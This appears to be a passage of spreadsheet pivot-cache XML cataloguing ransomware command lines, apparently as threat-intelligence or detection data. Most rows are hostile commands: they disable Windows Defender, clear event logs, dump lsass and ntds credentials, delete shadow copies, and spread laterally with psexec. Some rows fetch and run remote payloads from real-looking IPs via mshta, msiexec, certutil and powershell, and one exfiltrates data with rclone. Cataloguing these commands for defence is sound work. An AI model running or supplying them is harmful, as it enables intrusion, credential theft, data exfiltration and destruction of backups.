    <m/>
    <s v="reg.exe delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “Windows Defender” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0679"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKCR\*\shellex\ContextMenuHandlers\EPP” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0680"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKCR\Directory\shellex\ContextMenuHandlers\EPP” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0681"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKCR\Drive\shellex\ContextMenuHandlers\EPP” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0682"/>
    <m/>
    <m/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring $true;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0683"/>
    <m/>
    <m/>
    <s v="Add-MpPreference -ExclusionExtension “.exe”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0684"/>
    <m/>
    <m/>
    <s v="dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0685"/>
    <m/>
    <m/>
    <s v="cmd.exe /c “$programfiles\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0686"/>
    <m/>
    <m/>
    <s v="schtasks.exe /Change /TN “Microsoft\Windows\Windows Defender\Windows Defender Cleanup” /Disable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0687"/>
    <m/>
    <m/>
    <s v="schtasks.exe /Change /TN “Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance” /Disable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26"/>
  </r>
  <r>
    <s v="ransom-eid0689"/>
    <m/>
    <m/>
    <s v="$windir\$system32\cmd.exe /k C:\Windows\inf\usbhub\explorer.exe -f C:\Windows\inf\usbhub\config.log"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0690"/>
    <m/>
    <m/>
    <s v="$windir\$system32\cmd.exe /c ping 1.1.1.1 -n 10 &gt; Nul &amp; Del $selfpath\$selfname.exe /F /Q"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26"/>
  </r>
  <r>
    <s v="ransom-eid0692"/>
    <m/>
    <m/>
    <s v="wevtutil cl application"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0693"/>
    <m/>
    <m/>
    <s v="wevtutil cl security"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0694"/>
    <m/>
    <m/>
    <s v="wevtutil cl system"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0695"/>
    <m/>
    <m/>
    <s v="cmd.exe /C for /F \”tokens=*\” %1 in (‘wevutil.exe el’) DO wevutil.exe cl \”%1\”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0696"/>
    <m/>
    <m/>
    <s v="procdump.exe -accepteula -ma lsass.exe mem.dmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0700"/>
    <m/>
    <m/>
    <s v="netstat -ano"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0701"/>
    <m/>
    <m/>
    <s v="query session”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0705"/>
    <m/>
    <m/>
    <s v="dsquery subnet -limit 0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0710"/>
    <m/>
    <m/>
    <s v="whoami /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0713"/>
    <m/>
    <m/>
    <s v="mstsc /v xxx"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0714"/>
    <m/>
    <m/>
    <s v="mstsc /v xxx\c$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0715"/>
    <m/>
    <m/>
    <s v="“reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v “fDenyTSConnections” /t REG_DWORD /d 0 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0716"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26"/>
  </r>
  <r>
    <s v="ransom-eid0718"/>
    <m/>
    <m/>
    <s v="Set-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Terminal Server’-Name “fDenyTSConnections” -Value 0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0719"/>
    <m/>
    <m/>
    <s v="Enable-NetFirewallRule -DisplayGroup “Remote Desktop”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0720"/>
    <m/>
    <m/>
    <s v="“psexec.exe -accepteula -d -s \\&lt;ip _address&gt; &lt;executable _ path&gt;”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0721"/>
    <m/>
    <m/>
    <s v="“cmd /c copy &lt;executable _ path&gt; \\&lt;ip _address&gt;\ADMIN$ /y”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0722"/>
    <m/>
    <m/>
    <s v="“Bitsadmin /transfer debjob /download \\[localuser]\C$\Windows\[Conti].dll C:\Windows\[conti].dll”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26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26"/>
  </r>
  <r>
    <s v="ransom-eid0725"/>
    <m/>
    <m/>
    <s v="“$windir\$system32\msiexec.exe” /q /I hxxp://27.102.70[.]196/km"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0726"/>
    <m/>
    <m/>
    <s v="“vssadmin delete shadows /all /quiet “"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0727"/>
    <m/>
    <m/>
    <s v="“wbadmin delete catalog -quiet”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0728"/>
    <m/>
    <m/>
    <s v="“bcdedit /set {default} recoveryenabled no”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0729"/>
    <m/>
    <m/>
    <s v="“vssadmin delete shadows /all /quiet”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0730"/>
    <m/>
    <m/>
    <s v="“Get-ComputerRestorePoint | DeleteComputerRestorePoint;”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0731"/>
    <m/>
    <m/>
    <s v="“vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB”,"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0738"/>
    <m/>
    <m/>
    <s v="sc.exe config SQLTELEMETRY start=disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0739"/>
    <m/>
    <m/>
    <s v="sc.exe config SQLTELEMETRY$ECWDB2 start=disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0740"/>
    <m/>
    <m/>
    <s v="sc.exe config SQLWriter start=disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0741"/>
    <m/>
    <m/>
    <s v="sc.exe config SstpSvc start= disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0742"/>
    <m/>
    <m/>
    <s v="sc.exe config MBAMService start=disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0743"/>
    <m/>
    <m/>
    <s v="sc.exe config wuauserv start= disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0744"/>
    <m/>
    <m/>
    <s v="iisreset.exe /stop"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0745"/>
    <m/>
    <m/>
    <s v="taskkill /f /im vee*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0746"/>
    <m/>
    <m/>
    <s v="taskkill /f /im postg*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0747"/>
    <m/>
    <m/>
    <s v=" $windir\$system32\DllHost.exe / Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0748"/>
    <m/>
    <m/>
    <s v="$windir\$system32\DllHost.exe / Processid:{D2E7041B-2927–42fb-8E9F-7CE93B6DC937}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0749"/>
    <m/>
    <m/>
    <s v="Invoke-TokenManipulation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0750"/>
    <m/>
    <m/>
    <s v="Get-System"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0751"/>
    <m/>
    <m/>
    <s v="$windir\regedit.exe -single 1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0752"/>
    <m/>
    <m/>
    <s v=" cmd /c “”$user\$temp\update.bat” “"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26"/>
  </r>
  <r>
    <s v="ransom-eid0754"/>
    <m/>
    <m/>
    <s v="$windir\$system32\cmd.exe /k C:\Windows\inf\usbhub\explorer.exe -f C:\Windows\inf\usbhub\config.log"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0755"/>
    <m/>
    <m/>
    <s v="“ntdsutil “ac in ntds” “ifm” “cr fu C:\Perflogs\1” q q “"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid1163"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell -nop -exec bypass -EncodedCommand &lt;encode&gt;"/>
    <s v="rundll32.exe 1.dll, DLLRegisterServer"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid0757"/>
    <m/>
    <m/>
    <s v="cmd /c c:\\users\\public\\compareForFor.hta"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="$programfiles\\Microsoft Office\\Office14\\WINWORD.EXE"/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0758"/>
    <m/>
    <m/>
    <s v="regsvr32 $user\$appdata\Vote1.ocx"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="$programfiles\\Microsoft Office\\Office14\\WINWORD.EXE"/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0759"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic shadowcopy delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26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26"/>
  </r>
  <r>
    <s v="ransom-eid0762"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="“$windir\$system32\Wbem\WMIC.exe” process where “name like ‘%manage%’” delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26"/>
  </r>
  <r>
    <s v="ransom-eid0764"/>
    <m/>
    <m/>
    <s v="$windir\$system32\msiexec.exe /q /I hxxp://&lt;ip&gt;/&lt;resource&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26"/>
  </r>
  <r>
    <s v="ransom-eid0766"/>
    <m/>
    <m/>
    <s v="$windir\$system32\regsvr32.exe C:\Users\Public\compareForFor.jpg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="$windir\$system32\mshta.exe"/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0767"/>
    <m/>
    <m/>
    <s v="secretsdump.py &lt;domain&gt;/&lt;username&gt;@&lt;ip&gt; -outputfile 1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17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7"/>
  </r>
  <r>
    <s v="ransom-eid0773"/>
    <m/>
    <m/>
    <s v="echo enter |c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 &lt;username&gt;@168.100.9[.]137 -pw &lt;password&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0774"/>
    <m/>
    <m/>
    <s v="mshta http://92.51.2.22:443/UsySLX1n.hta"/>
    <m/>
    <m/>
    <s v="tomcat9.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0775"/>
    <m/>
    <m/>
    <s v="mshta http://92.51.2.22:443/TNillGnQ.hta"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0777"/>
    <m/>
    <m/>
    <s v="whoami"/>
    <m/>
    <m/>
    <s v="tomcat9.exe"/>
    <m/>
    <m/>
    <s v="NETWORK SERVICE"/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0778"/>
    <m/>
    <m/>
    <s v="&quot;query user"/>
    <m/>
    <m/>
    <s v="tomcat9.exe"/>
    <m/>
    <m/>
    <s v="NETWORK SERVICE"/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0779"/>
    <m/>
    <m/>
    <s v="curl http://92.51.2.22:8088/AnyDesk.msi -OutFile AnyDesk.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27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1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11"/>
  </r>
  <r>
    <s v="ransom-eid0784"/>
    <m/>
    <m/>
    <s v="wevutil el"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0785"/>
    <m/>
    <m/>
    <s v="wevutil cl &lt;log name&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27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12"/>
  </r>
  <r>
    <s v="ransom-eid0787"/>
    <m/>
    <m/>
    <s v="taskkill /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0788"/>
    <m/>
    <m/>
    <s v="taskkill /im"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0789"/>
    <m/>
    <m/>
    <s v="tasklist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0792"/>
    <m/>
    <m/>
    <s v="query user"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0793"/>
    <m/>
    <m/>
    <s v="cmd.exe /c /s asd.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe"/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0794"/>
    <m/>
    <m/>
    <s v="rclone --config=rclone.conf copy c:\&lt;directory&gt; mega:FTP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0795"/>
    <m/>
    <m/>
    <s v="cmd.exe /s / asd.ba"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0796"/>
    <m/>
    <m/>
    <s v="start cmd /k \&quot;C:\temp\LBB.exe -path \&quot;\\&lt;host&gt;\C$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0797"/>
    <m/>
    <m/>
    <s v="cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.css &lt;localfile&gt;.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0798"/>
    <m/>
    <m/>
    <s v="cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.msi &lt;localfile&gt;.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0799"/>
    <m/>
    <m/>
    <s v="cmd.exe /c driverquery"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28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8"/>
  </r>
  <r>
    <s v="ransom-eid0801"/>
    <m/>
    <m/>
    <s v="cmd.exe /c ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0804"/>
    <m/>
    <m/>
    <s v="cmd.exe /c netstat -a"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0805"/>
    <m/>
    <m/>
    <s v="cmd.exe /c sc query"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0806"/>
    <m/>
    <m/>
    <s v="cmd.exe /c schtasks"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0807"/>
    <m/>
    <m/>
    <s v="cmd.exe /c systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0808"/>
    <m/>
    <m/>
    <s v="cmd.exe /c ver"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0809"/>
    <m/>
    <m/>
    <s v="cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0810"/>
    <m/>
    <m/>
    <s v="cmd.exe /c wmic printjob"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0811"/>
    <m/>
    <m/>
    <s v="mmc.exe compmgmt.msc /computer:{hostname/ip}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0812"/>
    <m/>
    <m/>
    <s v="mstsc.exe /v:{hostname/ip}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0813"/>
    <m/>
    <m/>
    <s v="mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28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12"/>
  </r>
  <r>
    <s v="ransom-eid1327"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell iex((new-object net.webclient).downloadstring('https://textbin.net/raw/ls1jhefawt'))"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12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2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16"/>
  </r>
  <r>
    <s v="ransom-eid0208"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\apply.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0819"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} &quot;c:\windows\system32\taskkill.exe&quot; /f /im WRSA.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0820"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0821"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0822"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0823"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0824"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0825"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0826"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c &quot;c:\gaze.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0827"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c &quot;copy \\ad02\sysvol\gaze.exe c:\gaze.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28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8"/>
  </r>
  <r>
    <s v="ransom-eid0829"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0830"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0831"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0832"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0833"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0834"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0835"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0836"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0837"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0838"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0839"/>
    <m/>
    <m/>
